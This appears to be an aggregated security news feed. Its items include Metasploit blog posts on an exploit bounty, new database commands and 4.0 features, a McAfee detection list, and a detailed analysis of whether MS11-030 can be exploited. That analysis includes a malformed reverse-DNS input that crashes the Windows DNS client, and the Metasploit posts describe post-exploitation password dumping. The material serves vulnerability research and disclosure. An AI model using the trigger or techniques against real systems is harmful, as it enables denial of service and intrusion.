The next thing you do is gather as much information as possible about the vulnerability (CVE, OSVDB, ZDI, mailing lists, blogs, vendor's bug tracking system, etc). Reverse engineer the protocol or file format you're working with, find the root-cause by using whatever techniques (patch diffing, source code auditing, fuzzing, injection, etc), and then try to trigger a crash... hopefully a good one.  In two occasions, thanks to Joshua J. Drake, Jon Butler, and Carlos' reversing-fu, we found out that CVE-2011-0657 (MS11-030) and CVE-2011-1206 (IBM Tivoli LDAP) are most likely non-exploitable. Even if a vulnerability is not exploitable, the effort spent trying to exploit it is not wasted. Often times the experience of attempting a difficult exploit can be a great learning experience, and sharing that experience gives other people insight into the real impact of the vulnerability.

 

Once you have a nice crash, you try to exploit the bug and gain code execution.  Exploitation is all about precision, and there are many things you have to consider to get reliable code execution, which means there are many ways you can fail: bad heap layout, overwrite a freed object with an incorrect size, some variable on the stack you forgot to account for, overwrite a RET address, SEH, or a ROP gadget with an address that changes with every install, every service pack, or every patch level, etc, etc. Sometimes, you don't even realize that until you start throwing the exploit against all your VMs.  If that's the case, you go back and fix it... or worst case scenario, you rewrite four or five times just to get it right.  And that sucks!

 

Keep in mind that all this hard work had to be done within one week, and many of the participants could only do it in their spare time.  But of course, some lucky fews were blessed by other people from the security community with exploit writing, the Metasploit team also received assistance from fellow hackers with the vetting process.  To those who helped, you know who you are -- THANK YOU!:-)   But again, we would also like to thank the following people for participating, the amount of participation we saw was unexpected and greatly appreciated (for those who specified a nickname, that's the name you'll be listed here):

 

  • BH
  • Alino
  • Joshua J. Drake
  • glitch07
  • kc57
  • Lepke
  • HeadlessZeke
  • hal
  • diedthreetimes
  • woFF
  • Abysssec
  • Lincoln&  Corelanc0d3r
  • "hidden"
  • kralor
  • mog
  • axtaxt
  • rusko
  • AmonAmarth
  • Rob
  • Patrick Webster
  • Boris
  • xero_
  • nebojsa
  • Jon Butler
  • mr_me
  • cons0ul
  • Juan Vazquez
  • Mark Scrano

 

Lastly, as planned, we will move on to the paying phase. And for those who are going to Las Vegas for Black Hat / Defcon, we will see you there :-)

Channel Image14:56 Metasploit 4.0: The Database as a core feature» Metasploit

Early in the 3.x days, metasploit had support for using databases through plugins.  As the project grew, it became clear that tighter database integration was necessary for keeping track of the large amount of information a pentester might encounter during an engagement.  To support that, we moved database functionality into the core, to be available whenever a database was connected and later added postgres to the installer so that functionality could be used out of the box.  Still, the commands for dealing with the database and information stored there were sort of second-class citizens, all beginning with a "db_" prefix.  We recently addressed this issue for the upcoming 4.0 release.

 

Commands that query the database have lost their "db_" prefix, while those that deal with managing the DB itself have retained it. For example, "db_hosts" is now just "hosts" and "db_status" remains the same. The idea behind this change is that hosts (and other entities) don't really have anything to do with the database other than the fact that they are stored there. Additionally, the deprecated db_import_*, db_create, and db_destroy have been removed.

 

The remaining commands have been improved by expanding search abilities and standardizing option parsing.  So where you previously had to type full IP addresses to list more than one host, now all commands that search the database take hosts in nmap host specification format, and all of them that deal with services can take ports similarly. Furthermore, the options have been standardized a bit so -p always means port, -s always means service name.

 

Example usage for the services command:

 

msf > services 192.168.1-10.1,3,5 -p 22-25,80,443,445 192.168.99.0/24

Services
========

host             port  proto  name  state  info
----             ----  -----  ----  -----  ----
192.168.99.1     22    tcp    ssh   open
192.168.99.141   445   tcp    smb   open   Windows XP Service Pack 2 (language: Unknown) (name:XP-SP2) (domain:WORKGROUP)
192.168.100.129  445   tcp    smb   open   Unix Samba 3.4.7 (language: Unknown) (name:FOO) (domain:FOO)

msf >

 

The new changes also make it really easy to find services running on odd ports

 

msf auxiliary(ssh_version) > services -s ssh

Services
========

host            port  proto  name  state  info
----            ----  -----  ----  -----  ----
192.168.17.134  21    tcp    ssh   open   SSH-2.0-OpenSSH_4.4
192.168.17.134  22    tcp    ssh   open   SSH-2.0-OpenSSH_4.4
192.168.17.134  23    tcp    ssh   open   SSH-2.0-OpenSSH_4.4
192.168.17.134  80    tcp    ssh   open   SSH-2.0-OpenSSH_4.4
192.168.17.134  443   tcp    ssh   open   SSH-2.0-OpenSSH_4.4
192.168.17.134  1433  tcp    ssh   open   SSH-2.0-OpenSSH_4.4
192.168.17.134  8080  tcp    ssh   open   SSH-2.0-OpenSSH_4.4
192.168.17.134  8443  tcp    ssh   open   SSH-2.0-OpenSSH_4.4
192.168.17.134  9022  tcp    ssh   open   SSH-2.0-OpenSSH_4.4

msf >

 

An often requested feature is the ability to run a module against hosts in the database that match certain criteria.  That is now possible for scanner modules with the hosts and services commands' new -R flag (and --rhosts) which sets RHOSTS to the list of hosts returned.  If the result is more than 5 hosts, it makes options pretty hard to read, so Metasploit writes it out to a temporary file like so:

 

msf auxiliary(ssh_version) > services -s ssh --rhosts

Services
========

host             port  proto  name  state  info
----             ----  -----  ----  -----  ----
192.168.87.1     22    tcp    ssh   open   SSH-2.0-dropbear_0.52
192.168.87.119   22    tcp    ssh   open   SSH-2.0-OpenSSH_5.8p1 Debian-1ubuntu3
192.168.87.122   22    tcp    ssh   open   SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu6
192.168.87.126   22    tcp    ssh   open   SSH-2.0-OpenSSH_5.1p1 Debian-6ubuntu2
192.168.87.140   22    tcp    ssh   open   SSH-2.0-OpenSSH_5.5p1 Debian-4ubuntu5
192.168.87.145   22    tcp    ssh   open   SSH-2.0-OpenSSH_5.1p1 Debian-6ubuntu2
192.168.87.158   22    tcp    ssh   open   SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu6
192.168.88.1     22    tcp    ssh   open   SSH-2.0-dropbear_0.52
192.168.89.1     22    tcp    ssh   open   SSH-2.0-dropbear_0.52
192.168.90.1     22    tcp    ssh   open   SSH-2.0-dropbear_0.52
192.168.90.61    22    tcp    ssh   open   SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu6
192.168.93.1     22    tcp    ssh   open   SSH-2.0-dropbear_0.52
192.168.96.1     22    tcp    ssh   open   SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu7
192.168.96.134   22    tcp    ssh   open   SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
192.168.98.131   22    tcp    ssh   open   SSH-2.0-OpenSSH_5.1p1 FreeBSD-20080901

RHOSTS => file:/tmp/msf-db-rhosts-20110722-19191-18zr3bq-0

msf auxiliary(ssh_version) > show options

Module options (auxiliary/scanner/ssh/ssh_version):

   Name     Current Setting                                   Required  Description
   ----     ---------------                                   --------  -----------
   RHOSTS   file:/tmp/msf-db-rhosts-20110722-19191-18zr3bq-0  yes       The target address range or CIDR identifier
   RPORT    22                                                yes       The target port
   THREADS  254                                               yes       The number of concurrent threads
   TIMEOUT  30                                                yes       Timeout for the SSH probe

Another way to make dealing with all that data easier is through the use of workspaces.  Workspaces have been around for awhile, but they are an underused feature that allows you to seperate hosts, credentials, etc. for each engagement into their own silo.  Every piece of data that metasploit records is associated with the current workspace, so it's quite easy to keep related information together and segregate different engagements by switching workspaces.

 

The command by itself will list available workspaces, the current one marked with an asterisk:

 

msf > workspace
  default
* engagement_A
  engagement_B
  engagement_C
  the_whole_friggin_internet

 

You can change the current workspace with workspace <name>.  For extra convenience, names are tab-completable, too.  You can add new workspaces with -a or delete existing ones with -d.  Note that -d assumes you really meant it and will happily delete the whole thing (including hosts, credentials, loot, and all) without prompting.

 

The journey from a glued-on appendage, to a main feature only used by db_autopwn, to a core feature integrated with the whole framework has been an adventure.  I think the result is easier access to information, better seperation of that data, and a smoother, faster pentest.

Channel Image14:56 Metasploit 4.0 is coming soon!» Metasploit

EthicalHackerRegistration.jpgIt'll only be days until you can download the new Metasploit version 4.0!

 

The new version marks the inclusion of 36 new exploits, 27 new post-exploitation modules and 12 auxiliary modules, all added since the release of version 3.7.1 in May 2011. These additions include nine new SCADA exploits, improved 64-bit Linux payloads, exploits for Firefox and Internet Explorer, full-HTTPS and HTTP Meterpreter stagers, and post-exploitation modules for dumping passwords from Outlook, WSFTP, CoreFTP, SmartFTP, TotalCommander, BitCoin, and many other applications. All of these these improvements are available in all Metasploit editions - the free and open source Metasploit Framework, as well as the commercial editions Metasploit Pro and Metasploit Express.

 

As usual, we'll have several blog posts about developments to the Metasploit Framework in the coming weeks. In this post, I'd like to focus on some of the new features in the commercial editions. Metasploit Pro 4.0 is all about greater enterprise integration, cloud deployment options, and penetration testing automation. The best news for customers holding a valid license for Metasploit Express or Metasploit Pro: you’ll be able to upgrade free of charge. Here are some of the features in Metasploit Pro 4.0:

 

Make Metasploit Pro an integral part of your risk intelligence solution

 

  • New third-party import filters: You can now import scan results from more than a dozen third-party web application scanners and additional vulnerability assessment tools to prioritize vulnerabilities and eliminate false positives (see full list of supported import formats).
  • Deeper integration with NeXpose: While Metasploit provides only a file import option for third-party scanners, integrate directly with one or more NeXpose scan engines to start a scan or to verify results. This is particularly useful to organizations that have deployed NeXpose as an enterprise solution. As a result, organizations can streamline the verification of vulnerabilities and reduce their remediation costs.The integration is provided through officially supported, publicly documented APIs.
  • Vulnerability Management List Editing: Add, modify, and delete vulnerability information directly through the product user interface to tweak imported data base on verification results and add additional findings as needed.
  • SIEM integration interface: Integrate Metasploit Pro with your Security Information and Event Management (SIEM) system through the RPC API and open XML format to get a better picture of your risk landscape.
  • Automated security tests: Programmatically remote control Metasploit Pro through a new RPC programming interface to verify vulnerabilities or test systems.

 

Deploy Metasploit Pro in a way that works for you

 

  • Pre-packaged images for VMware vSphere: You can now deploy Metasploit as a VMware image using VMware vSphere. This decreases provisioning costs for vulnerability programs covering remote locations. The OVF format is also compatible with other virtualization solutions.
  • Amazon Machine Image: If you need to conduct external penetration tests, you can easily deploy Metasploit in the Amazon Elastic Compute Cloud (EC2). Metasploit is available as an Amazon Machine Image (AMI) and payment for the hosting costs can be processed through Amazon Web Services (AWS) accounts, making provisioning quick and easy, even with small budgets.

 

Boost your penetration tests

 

  • Persistent agents and listeners: During a penetration test, mobile users and temporary network problems can cause established sessions to drop. Re-running the same exploit may not always lead to another session (or even be possible). Meterpreter now supports persistent agents and listeners so that the target machine actively re-establishes a session when it drops. Agents automatically expire after a pre-configured amount of time.
  • Macros: Write macros that get triggered by certain events. For example, if you launch a social engineering campaign, you won’t know when an email user will click on a link or open a malicious attachment, so it is not practical to wait for someone to do so and create a session. Using post-exploitation macros, you can automate what happens once a target user falls into a social engineering trap. For example, the macro could automatically loot the machine or carry out a set of pre-defined steps. Macros can chain together are arbitrary post-exploitation modules and be extended through custom post-exploitation modules.
  • Exploit replay: You can now replay all previously successful attacks. This makes verification of patch installation and configurations changes trivial. This also allows the export from one Metasploit copy to be used in a later verification through another copy.
  • Offline password cracking: As a result of Rapid7’s sponsorship of the open-source project John the Ripper, Metasploit Pro now automatically cracks weak passwords during the evidence collection phase, making it possible to replay these passwords across multiple machines and protocols.

 

Inform stakeholders and document compliance with updated reports

 

  • FISMA reports: Easily document compliance with FISMA through a new report that maps findings to controls and requirements.
  • More visual reports: Metasploit Pro reports now contain charts and diagrams that visualize the results of a penetration tests.

 

Other new features include

 

  • Increased exploitation speed
  • Updated social engineering campaigns, including the ability to clone existing websites and edit HTML in a rich editor
  • Updated user interface to simplify managing large projects
  • Easily re-run tasks that have been aborted by the user
  • Global settings for configuring NeXpose scan engines, macros, and API keys

 

If you're a Metasploit Express customer and would like to know which of these features are included in your edition, please see the Metasploit Compare & Download  page.

 

Metasploit 4.0 will be available for download in August 2011. If you can't wait that long, register for an exclusive sneak preview with HD Moore this Thursday to see the new Metasploit Pro 4.0 in action!

-->The Metasploit Framework is continuously updated and version 4.0 marks the inclusion of 36 new exploits, 27 new post-exploitation modules and 12 auxiliary modules, all added since the release of version 3.7.1 in May 2011. These additions include nine new SCADA exploits, improved 64-bit Linux payloads, exploits for Firefox and Internet Explorer, full-HTTPS and HTTP Meterpreter stagers, and post-exploitation modules for dumping passwords from Outlook, WSFTP, CoreFTP, SmartFTP, TotalCommander, BitCoin, and many other applications. For more information on the ongoing development of the Metasploit Framework, please visit the Metasploit blog
Channel Image14:56 May 12th, 2006» Virus Tracker
DAT Version:4761
DAT Release Date:5-12-2006
Threats Detected:189,692
New Detections:9
Enhanced Detections:73



Enhanced detections are those that have been modified for this release. Detections are enhanced to cover new variants, optimize performance, and correct incorrect identifications.

Full list

New DetectionsEnhanced detections
Trojan (2)
  Remote Access (1)
    BackDoor-CZS
  Win32 (1)
    Generic Uploader.a
Virus (7)
  Application extension (1)
    W32/Bagle.ex.dll
  Companion (2)
    W32/Kenfa.cmp.a
    W32/Kenfa.cmp.b
  Email (1)
    W32/Bugbear.n@MM
  Win32 (2)
    W32/Bagle.ex
    W32/Virut.a
  Worm (1)
    Hilder.worm
Trojan (34)
   (1)
    Generic BackDoor.bb
  Application extension (3)
    BackDoor-BAC.dll
    Generic.da.dll
    Puper.dll
  Downloader (6)
    Downloader-DC
    W32/Bagle.cj
    W32/Bagle.dk
    Downloader-YF
    Downloader-ZQ
    Downloader-MC
  Dropper (1)
    PWS-Goldun.dr
  Exploit (2)
    Exploit-CreateTxtRng
    Exploit-SWF.b!demo
  Generic (4)
    Oleloa.gen
    PWS-Banker.gen.bb
    PWS-Banker.gen.t
    PWS-Banker.gen.v
  Password Stealer (5)
    PWS-Banker.ai
    PWS-Banker.gen.ba
    PWS-Banker.gen.i
    PWS-Goldun.sys
    PWS-WoW
  PDA Device (1)
    SymbOS/Skulls.a
  Proxy (1)
    Proxy-Horst
  Remote Access (3)
    Generic BackDoor.l
    BackDoor-CYY
    BackDoor-CKB
  Win32 (7)
    Generic Downloader.a
    Puper
    Generic Downloader.s
    Generic Downloader.af
    Generic Downloader.r
    Generic PWS.o
    Generic Downloader.ab
Virus (39)
   (12)
    SymbOS/Skulls.ci
    SymbOS/Skulls.f
    SymbOS/Skulls.e
    SymbOS/Skulls.g
    SymbOS/Skulls.h
    SymbOS/Skulls.i
    SymbOS/Skulls.cf
    SymbOS/Skulls.cg
    SymbOS/Skulls.c
    SymbOS/Skulls!aif
    SymbOS/Skulls.d
    SymbOS/Skulls.ca
  Application extension (2)
    W32/Bagle.ew.dll
    W32/Bagle.dll
  Downloader (4)
    W32/Bagle.ci
    W32/Bagle.ck
    W32/Bagle.cl
    W32/Bagle.cn
  E-mail (2)
    W32/Bugbear.o@MM
    W32/Bagle.bf@MM
  Email (1)
    W32/Bagle.ar@MM
  Email Generic (1)
    JS/Feebs.gen.h@MM
  Generic (1)
    SymbOS/Skulls.gen
  Generic Worm (1)
    W32/Sdbot.worm.gen.h
  Internet Worm (1)
    W32/Bugbear.gen@MM
  Win32 (14)
    New Win32.s
    New Poly Win32
    New Win32
    W32/Bagle.cw
    W32/Bagle.cu
    W32/Bagle.cr
    W32/Bagle.co
    W32/Bagle.cm
    W32/Bagle.cx
    W32/Bagle.cv
    W32/Bagle.cs
    W32/Bagle.an
    W32/Bagway
    W32/Bagle
Channel Image14:56 MS11-030: Exploitable or Not?» Metasploit

If you weren’t already aware, Rapid7 is offering a bounty for exploits that target a bunch of hand-selected, patched vulnerabilities. There are two lists to choose from, the Top 5 and the Top 25 . An exploit for an issue in the Top 5 list will receive a $500 bounty and one from the Top 25  list will fetch a $100 bounty. In addition to a monetary reward, a successful participant also gets to join the elite group of people that have contributed to Metasploit over the years. Their work will be immortally assimilated into the Framework, under BSD license, for all to see.

 

Despite the low value of the reward, I saw this as an opportunity to make a little extra cash and take a look a fairly challenging bug. I selected CVE-2011-0657 from the Top 5 due to my previous experience with the DNS protocol. After I claimed the bug, and checked that my name was safely in the table of players, I immediately began procrastinating.

 

Later that day, Jon Butler (@securitea) tweeted to the effect that he had been working on the bug. I replied, letting him know I was willing to collaborate and share the cash and glory. After discussing some logistics, Jon sent me his commented IDB of the old version of DNSAPI.dll from Windows 7 and a PoC based on Scapy. When I opened the IDB, Jon already had it pointed at the “_Dns_Ip4ReverseNameToAddress_A” function. It was well commented, but I quickly invoked the Hex-Rays decompiler and started analyzing the function. You can find the HTML output here. You probably want to keep it open in a new tab while you continue reading.

 

After doing some input validation, the string preceding “.in-addr.arpa” is copied into a local stack buffer on line 23. Inspecting the constraints showed that it isn’t possible to cause a buffer overflow at this point.

 

I read on and noticed that it was processing the local stack buffer in reverse. It starts with “v_suffix” on line 26 and looks to see if it points at a ‘.’ character. If the value ever points at the beginning of the buffer, processing is halted and the “v_return” value is written to the output “a_ret” pointer on line 49. This seems all well and good, or is it?

 

After looking for a few more minutes, I came to a realization. Here is an excerpt from the chat log with Jon.

 

(5:33:22 PM) jduck: hexrays shows two nested loops

(5:33:48 PM) jduck: while (1) { while (1) { --endptr; .... } ... --endptr; }

(5:33:55 PM) jduck: so it could double decrement

(5:34:11 PM) jduck: then the if == begin will never catch it

(5:34:39 PM) Jon Butler: hmm

(5:34:43 PM) jduck: 0.in-addr.arpa == trigger

(5:34:53 PM) Jon Butler: i'll test it

(5:35:45 PM) Jon Butler: no crash

 

A skilled auditor may notice my error here. I thought for sure that would crash the service, but it didn’t. So I thought some more...

 

(5:35:54 PM) jduck: im running thru it in my head hehe

(5:36:02 PM) Jon Butler: yeah, its all good

(5:36:06 PM) Jon Butler: cant hurt to try

(5:36:13 PM) jduck: maybe .0.in-addr.arpa ?

(5:36:16 PM) Jon Butler: i was thinking lots of dots might do it as well

(5:36:20 PM) jduck: with a preceding period

 

Now at this point, I had some doubt that this was the bug at all and changed the subject of our conversation before Jon got a chance to test with this input. Silly me. Also, Jon was having some issues getting a debugger going attached to the service.

 

(5:24:47 PM) Jon Butler: also, protip: dont atatch windbg to the DNS client then wait while windbg tries to resolve microsoft.com to get symbols

 

Jon and I spent the rest of Tuesday evening and most of Wednesday evening flailing every which way except the right direction. Jon battled the symbol resolution problem while I went off on a tangent trying to trigger the bug in XP. By Wednesday evening (late night Wednesday for Jon), he had solved the symbol issue and began stepping through the code to gain a better understanding. We threw several ideas back and forth, but none of them lead to a crash. Eventually, time got the better of us and we called it a day.

 

NOTE: In order to work around the symbol issue, its possible to use the “symchk” executable to download the symbols for the “dnscache” service process before attaching to it. Once downloaded, set the _NT_SYMBOL_PATH variable to point to *ONLY* the local symbol directory, and voila.

 

Thursday, Jon came online and we continued reviewing the changed functions within the XP DNSAPI.dll. We were hoping that they might give us some insight that we didn’t get before. On Jon’s recommendation, I asked HD about the Windows XP vector. It went something like this:

 

19:54 <@jduck> will rapid7 give $500 for the local xp exploit?

19:54 <@hdm> jduck: sure if its a remote on windows 7

 

So I abandoned my efforts trying to trigger the bug via the LPC on XP, and diverted my attention back to Windows 7. I started by going back through the changes (still using XP binaries) one at a time, hoping to eliminate any that weren’t security related. I found some changes related to locking, but it’s unclear if that was related. After I went through all of these changes, and didn’t find any glaring issues, I went back to diffing the Windows 7 binaries. I grabbed fresh copies of the DLLs, grabbed fresh copies of their symbols, created fresh IDBs and BinDiff'd them. To my surprise, there was were only four changed functions!

 

diff.png

 

After getting my Windows 7 VM going, working around the symbol resolution issue, I started playing around sending inputs. I read the IPv6 version, ”_Dns_Ip6ReverseNameToAddress_A”,

and spent a couple of hours sending various inputs. Finally, I got a crash!

 

Unfortunately, it was only a 0xc00000fd exception. The human-readable description of this exception code, which irks one of my pet peeves, is often displayed as “Stack Overflow”. This is not the kind of crash you want to see when developing an exploit since this kind of crash is rarely exploitable. In this particular case, there is no exception handler, so it simply kills the process. The service is set to restart automatically twice, and reset counts after one day, but that isn’t terribly helpful (try: sc qfailure dnscache).

 

Let’s take another look at the decompiler output for the Ip4 version. Consider an input string of “.0.in-addr.arpa”. On the first iteration, a ‘0’ will be found, so “v_suffix” will simply be decremented. On the second iteration, a ‘.’ character is found on line 33. Next, it is overwritten with a NUL byte on line 38 and re-incremented. The “strtoul” function is called on line 40 and the return value from it is merged into ultimate return value on line 43. Since “v_suffix” does not point to the beginning of the buffer, it will be decremented on line 47. Note that after decrementing the pointer here, it will point at the beginning of the buffer (the first ‘.’ character). The next statement that is executed is “--v_suffix;” on line 32. At this point, the pointer has escaped the bounds of the local buffer, and will never again have the chance to point to the beginning. If no ‘.’ character is found before the beginning of the stack is reached, the 0xc00000fd exception will be raised when the guard page at the top of the stack is accessed.

 

Even though I managed to crash the process, I wasn’t 100% sure that this was the reason Microsoft released an update. I didn’t see anything interesting in the other changed functions. It seemed unlikely that anything good could come from this since there was no return address or function pointer on the stack before the function.

 

My first thought was to assume that I could control the data above the buffer on the stack. I hypothesized that I could do this via some deeper call stack that would occur in a preceding function call. Perhaps controlling this data would allow passing an input string that was longer than the function originally allowed. That would violate assumptions made by the programmers, and could lead to further corruption. So I created a WinDbg script that would put more valid-ish strings into the stack above (lower addresses) the buffer.

 

First I tested with the Ip4 variant, but it didn’t yield anything fun. Then, I tried some things with the Ip6 version, which writes one byte at a time for each pair of nibbles encountered (ex. “a.b.”). It will write up to 16 bytes (the size of the destination buffer passed in, likely a struct in6_addr). I double-checked and concluded that it wasn’t possible to cause a buffer overflow this way.

 

Although I didn’t get an awesome crash from this experiment, I found that it was possible to prevent a crash from occurring this way. In one instance, an already-used return address on the stack contained a ‘.’ character and prevented the crash. Being able to force this type of behavior is certainly advantageous, so I wrote this down for later.

 

Slightly disappointed with these results, I took a look at the Ip4 version’s stack frame.

 

stack.png

 

Just before the data in “v_buf”, we find the pointer “v_out_ptr”. After a brief look over, it seemed the best next-step would be to try to corrupt this pointer and cause the “v_result” value to be written somewhere unexpected. If the pointer happened to contain a ‘.’ character, it would get replaced by a NUL byte. That is, if “v_out_ptr” was 0x00132e40, it would then become 0x00130040. It is possible for this to happen one of two ways. First, we would need to find some way to control the length of preceding function calls stack frames (ex. via “alloca”). This is often a long tedious path, for which not many good tools exist. The other option means crossing our fingers and hoping ASLR gives us a lucky value. I love rare cases where a mitigation contributes to exploitability!

 

NOTE: Although it’s not visible in the decompiler output, the “v_out_ptr” is read from the stack immediately before writing the output value. This is one of the reasons why the decompiler can be misleading when doing exploit development.

 

Initially, I tried a few experiments using the Ip6 version. Unfortunately, the Ip6 version has far more strict handling of the return from “strtoul”. If a zero is returned (ex. a string like “z.”), or if the value is greater than 15, the loop terminates and nothing is written. So I went to check the situation using the Ip4 version. It is a bit more lenient in that it accepts zero return values, as you can see on line 41. However, if we fail that conditional the function returns zero and no write occurs. In fact, only way to get the Ip4 function to write to “v_out_ptr” is when “v_suffix” points at the start of the buffer (line 44). Ugh, strict constraints or impossibilities, not a good feeling.

 

Finally, on Saturday, I caved in and decided to reach out to Neel Mehta. As the original discoverer of the vulnerability, I figured he had a unique perspective on the issue. After exchanging several emails, Neel confirmed that I had nailed the root cause and offered several promising ideas for where to go next.

 

The first idea was to use TCP based LLMNR resolution. I looked at my Windows 7 SP0 machine and it wasn’t listening on TCP port 5355. Bummer. Further googling led to an old TechNet arcticle that states “TCP-based LLMNR messages are not supported in Windows Vista”. Even if Windows 7 supports this feature, RFC4795 says TCP resolution is only used when the server has a reply that is too long for UDP. In this situation, similar to traditional DNS, the truncation (TC) bit is set in the flags section. Although it may be possible to construct a serious of queries and/or spoofed responses in order to elicit a truncated response, this was not investigated. This could be considered an exercise for the reader, should you be so inclined.

 

The second idea that Neel conveyed centered around the additional registers that are pushed onto the stack within the course of the functions executing. Looking at push instructions in the function shows that esi, edi, and ebx are pushed to the stack (in that order). These registers are later restored prior to returning to the calling function, “Dns_StringToDnsAddrEx”. After returning, the ebx register is checked against the value 0x17. The edi register is passed to one of the “RtlIpv6StringtoAddressEx” functions (ANSI or UNICODE). The esi register is passed as the destination argument to one of two ‘‘bzero(dst, 0x40)” calls. Unfortunately, none of this looked particularly promising.

 

The third idea that Neel proposed was to investigate the interaction between regular DNS queries and these functions. It turns out that the calling function is called from “DnsGetProxyInfoPrivate” which is exported along with “DnsGetProxyInformation”. We made no further effort to investigate this avenue. Perhaps another exercise for the reader :-)

 

With Saturday winding down, I decided to put together a quick trigger-fuzzer to test if random luck would lead to anything sexy. I ran it for an hour or so, but quickly got tired of looking at 0xc00000fd exception after 0xc00000fd exception. My hope had started to run out and my batteries needed recharging, so I crashed.

 

Sunday, Jon and I went back and forth discussing whether or not the issue was exploitable at all. We recapped our findings, but ultimately came to the conclusion that there was no way we could write a reliable exploit in time to qualify for the bounty. I had previously said I’d conduct a few more experiments in the debugger to see if corrupting the other stack-saved registers led to any nice crashes in the parent function. I set a break point in the processing loop of each of the vulnerable functions and fired off some trigger queries. Each time the breakpoint was hit, I wrote a ‘.’ character to a byte offset in the saved register area and continuing execution. Out of all 16 bytes, only one led to a different crash. This was the saved esi value, which was subequently used in the bzero operation.

 

Similar to the “v_out_ptr” value, this value was a stack pointer that points to a the output area of “Dns_StringToDnsAddrEx”. If it happened to contain a ‘.’ character, it would get modified to point to an address higher on the stack. This really isn’t much help since we’re already higher than any data that could affect code flow (return addreses, etc). This path seemed like a dead end. Having fulfilled my promise to try this experiment, I readied myself to admit defeat.

 

Prior to formally giving up on the bounty, Jon suggested I email Neel one last time to ask if he managed to obtain code execution from this vulnerability. Neel replied stating he hadn’t. He decided to stop work on the bug once Microsoft agreed that the issue should be rated Critical. He reiterated that he believes it’s possible to exploit this bug, but agreed that it was definitely more challenging than most bugs.

 

Although I want to believe that the bug is exploitable, I simply can’t see a way. Jon and I have folded. I would love to say this bug is unequivocally not exploitable, but as we have seen in the past this probably isn’t wise. Regardless, it seems to me, and I believe the facts show, that this bug is challenging enough that it’s not possible to write a reliable exploit leveraging it in one week.

 

Despite my opinion, there are still some avenues left unexplored for those that are inclined to push forward on this bug. If you wish to continue where we left off or just play with bug, our technical notes are available and a DoS Metasploit module has been added to the tree. If you do push the analysis envelope forward on this bug, we hope you will contribute your findings back to the community. Good luck and happy exploiting to you all!

Channel Image14:56 MPlayer Vulnerability Analysis» securecoding.org
Ken and Sean analyze a recently discovered buffer overflow vulnerability in a popular media player for Unix and discuss it's far-reaching implications.
Channel Image14:56 MPL Upgrade for the Mozilla Project» Hacking for Christ
Mozilla is on the verge of completing an 18-month process to revise the Mozilla Public License (MPL), the licence it has used for most new code since the original release of the source code in 1998. MPL 2 is about half the length of MPL 1.1, has many provisions removed which have become onerous to comply with, and has better compatibility with other licences. Many in the Mozilla community, including the project leadership, have reviewed drafts of the upcoming version and are eager to adopt it, in place of the tri-licensing scheme we currently use. (The MPL 2 is compatible with the LGPL and GPL, like the tri-licence.) We'd like to make sure all of the Mozilla community is aware that a decision on upgrading our code to the MPL 2 will be made shortly, and if there are any issues with doing so, we'd like to know about them before the licence is finalized. We invite project participants to review the licence and raise any issues or questions they may have. There is also a document about the upgrade process, which explains how we would go about it. Feedback on the proposals therein - both in mechanism and scope - is also very welcome. Feedback can be sent to the mozilla.governance discussion forum....
Channel Image14:56 MHTML vulnerability under active exploitation» Google Online Security Blog


We’ve noticed some highly targeted and apparently politically motivated attacks against our users. We believe activists may have been a specific target. We’ve also seen attacks against users of another popular social site. All these attacks abuse a publicly-disclosed MHTML vulnerability for which an exploit was publicly posted in January 2011. Users browsing with the Internet Explorer browser are affected.

For now, we recommend concerned users and corporations seriously consider deploying Microsoft’s temporary Fixit to block this attack until an official patch is available.

To help protect users of our services, we have deployed various server-side defenses to make the MHTML vulnerability harder to exploit. That said, these are not tenable long-term solutions, and we can’t guarantee them to be 100% reliable or comprehensive. We’re working with Microsoft to develop a comprehensive solution for this issue.

The abuse of this vulnerability is also interesting because it represents a new quality in the exploitation of web-level vulnerabilities. To date, similar attacks focused on directly compromising users' systems, as opposed to leveraging vulnerabilities to interact with web
services.
Channel Image14:56 Letter Urges USTR To Set Aside Internet Prong of ACTA» Center for Democracy and Technology
CDT joined a group of public interest, library, and technology industry organizations yesterday in a letter urging the United States Trade Representative to set aside the controversial portion of the Anti-Counterfeiting Trade Agreement (ACTA) negotiations focused on "Internet distribution and information technology." These Internet provisions could touch on such hotly debated issues as the role of ISPs in policing the online behavior of subscribers, yet the lack of transparency regarding potential proposals has prevented technology and consumer interests from being able to provide meaningful input. The letter also called for strong measures to facilitate such transparency and input.
Channel Image14:56 Landing another blow against email phishing» Google Online Security Blog


Email phishing, in which someone tries to trick you into revealing personal information by sending fake emails that look legitimate, remains one of the biggest online threats. One of the most popular methods that scammers employ is something called domain spoofing. With this technique, someone sends a message that seems legitimate when you look at the “From” line even though it’s actually a fake. Email phishing is costing regular people and companies millions of dollars each year, if not more, and in response, Google and other companies have been talking about how we can move beyond the solutions we’ve developed individually over the years to make a real difference for the whole email industry.

Industry groups come and go, and it’s not always easy to tell at the beginning which ones are actually going to generate good solutions. When the right contributors come together to solve real problems, though, real things happen. That’s why we’re particularly optimistic about today’s announcement of DMARC.org, a passionate collection of companies focused on significantly cutting down on email phishing and other malicious mail.

Building upon the work of previous mail authentication standards like SPF and DKIM, DMARC is responding to domain spoofing and other phishing methods by creating a standard protocol by which we’ll be able to measure and enforce the authenticity of emails. With DMARC, large email senders can ensure that the email they send is being recognized by mail providers like Gmail as legitimate, as well as set policies so that mail providers can reject messages that try to spoof the senders’ addresses.

We’ve been active in the leadership of the DMARC group for almost two years, and now that Gmail and several other large mail senders and providers — namely Facebook, LinkedIn, and PayPal — are actively using the DMARC specification, the road is paved for more members of the email ecosystem to start getting a handle on phishing. Our recent data indicates that roughly 15% of non-spam messages in Gmail are already coming from domains protected by DMARC, which means Gmail users like you don’t need to worry about spoofed messages from these senders. The phishing potential plummets when the system just works, and that’s what DMARC provides.

If you’re a large email sender and you want to try out the DMARC specification, you can learn more at the DMARC website. Even if you’re not ready to take on the challenge of authenticating all your outbound mail just yet, there’s no reason to not sign up to start receiving reports of mail that fraudulently claims to originate from your address. With further adoption of DMARC, we can all look forward to a more trustworthy overall experience with email.
Channel Image14:56 Javascript Obfuscation in Metasploit» Metasploit

As of this writing, Metasploit has 152 browser exploits. Of those, 116 use javascript either to trigger the vulnerability or as a means to control the memory layout of the browser process [1]. Right now most of that javascript is static. That makes it easier for anti-virus and IDS folks to signature. That makes it less likely for you to get a shell.

 

